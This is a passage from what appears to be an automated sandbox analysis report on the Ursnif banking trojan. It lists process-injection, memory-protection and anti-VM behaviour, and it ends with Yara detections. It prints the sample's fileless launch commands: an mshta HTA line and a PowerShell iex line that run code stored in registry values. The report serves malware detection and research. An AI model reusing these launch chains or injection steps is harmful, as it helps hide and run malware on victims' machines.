            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5040Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3816Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.dllJump to dropped file
            Source: C:\Windows\System32\loaddll32.exe TID: 6784Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5644Thread sleep time: -8301034833169293s >= -30000sJump to behavior
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00458A61 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_00458A61
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00443DEE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,0_2_00443DEE
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00456E86 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,0_2_00456E86
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00461C05 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,0_2_00461C05
            Source: explorer.exe, 00000021.00000000.416616330.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000021.00000000.416616330.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
            Source: explorer.exe, 00000021.00000000.416282562.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000021.00000000.416074813.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: RuntimeBroker.exe, 00000026.00000000.426595121.000001FC1125D000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000021.00000000.419810588.000000000F540000.00000004.00000001.sdmpBinary or memory string: d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&t
            Source: explorer.exe, 00000021.00000000.416616330.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
            Source: explorer.exe, 00000021.00000000.416616330.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
            Source: mshta.exe, 00000019.00000003.369765641.0000022A92B49000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t
            Source: explorer.exe, 00000021.00000000.416803055.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
            Source: explorer.exe, 00000021.00000000.411212416.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
            Source: explorer.exe, 00000021.00000000.416074813.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 00000021.00000000.416074813.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: mshta.exe, 00000019.00000003.369765641.0000022A92B49000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: explorer.exe, 00000021.00000000.416074813.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Windows\System32\loaddll32.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0045735C LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0045735C
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_0043040A mov eax, dword ptr fs:[00000030h]0_3_0043040A
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_004300B7 mov esi, dword ptr fs:[00000030h]0_3_004300B7
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0045DA66 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,0_2_0045DA66

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Allocates memory in foreign processesShow sources
            Source: C:\Windows\System32\loaddll32.exeMemory allocated: C:\Windows\System32\control.exe base: 1060000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1FC13560000 protect: page execute and read and write
            Changes memory attributes in foreign processes to executable or writableShow sources
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute read
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute read
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute read
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute read
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute read
            Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Compiles code for process injection (via .Net compiler)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.0.csJump to dropped file
            Creates a thread in another existing process (thread injection)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 736E1580Jump to behavior
            Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 736E1580
            Source: C:\Windows\explorer.exeThread created: unknown EIP: 736E1580
            Source: C:\Windows\explorer.exeThread created: unknown EIP: 736E1580
            Source: C:\Windows\explorer.exeThread created: unknown EIP: 736E1580
            Source: C:\Windows\System32\control.exeThread created: unknown EIP: 736E1580
            Injects code into the Windows Explorer (explorer.exe)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3388 base: 10AE000 value: 00Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3388 base: 7FFB736E1580 value: EBJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3388 base: 1280000 value: 80Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3388 base: 7FFB736E1580 value: 40Jump to behavior
            Maps a DLL or memory area into another processShow sources
            Source: C:\Windows\System32\loaddll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
            Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
            Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
            Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
            Source: C:\Windows\System32\control.exeSection loaded: unknown target: unknown protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Windows\System32\loaddll32.exeThread register set: target process: 4672Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3388Jump to behavior
            Source: C:\Windows\explorer.exeThread register set: target process: 3668
            Source: C:\Windows\explorer.exeThread register set: target process: 4376
            Source: C:\Windows\explorer.exeThread register set: target process: 4588
            Source: C:\Windows\explorer.exeThread register set: target process: 5964
            Source: C:\Windows\System32\control.exeThread register set: target process: 5036
            Writes to foreign memory regionsShow sources
            Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF6578712E0Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\control.exe base: 1060000Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF6578712E0Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 10AE000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFB736E1580Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 1280000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFB736E1580Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 6E40E02000
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1FC13560000
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline'Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline'Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8664.tmp' 'c:\Users\user\AppData\Local\Temp\1453igkk\CSCD2500265572748DEA3D91E508E5342FB.TMP'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9384.tmp' 'c:\Users\user\AppData\Local\Temp\jery0dbp\CSCF9697DD756E45B2A9442C531AA1339A.TMP'
            Source: C:\Windows\System32\control.exeProcess created: unknown unknown
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: explorer.exe, 00000021.00000000.400884078.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
            Source: explorer.exe, 00000021.00000000.401136187.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.426842454.000001FC11790000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000021.00000000.401136187.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.426842454.000001FC11790000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000021.00000000.401136187.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.426842454.000001FC11790000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000021.00000000.401136187.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.426842454.000001FC11790000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00454270 cpuid 0_2_00454270
            Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,0_2_737519DA
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0044190E CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,0_2_0044190E
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_737513E4 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_737513E4
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0044B868 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,0_2_0044B868
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_73751371 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_73751371
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242195768.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242321431.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242337914.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.416323968.0000011AB4010000.00000004.00000001.sdmp, type: MEMORY
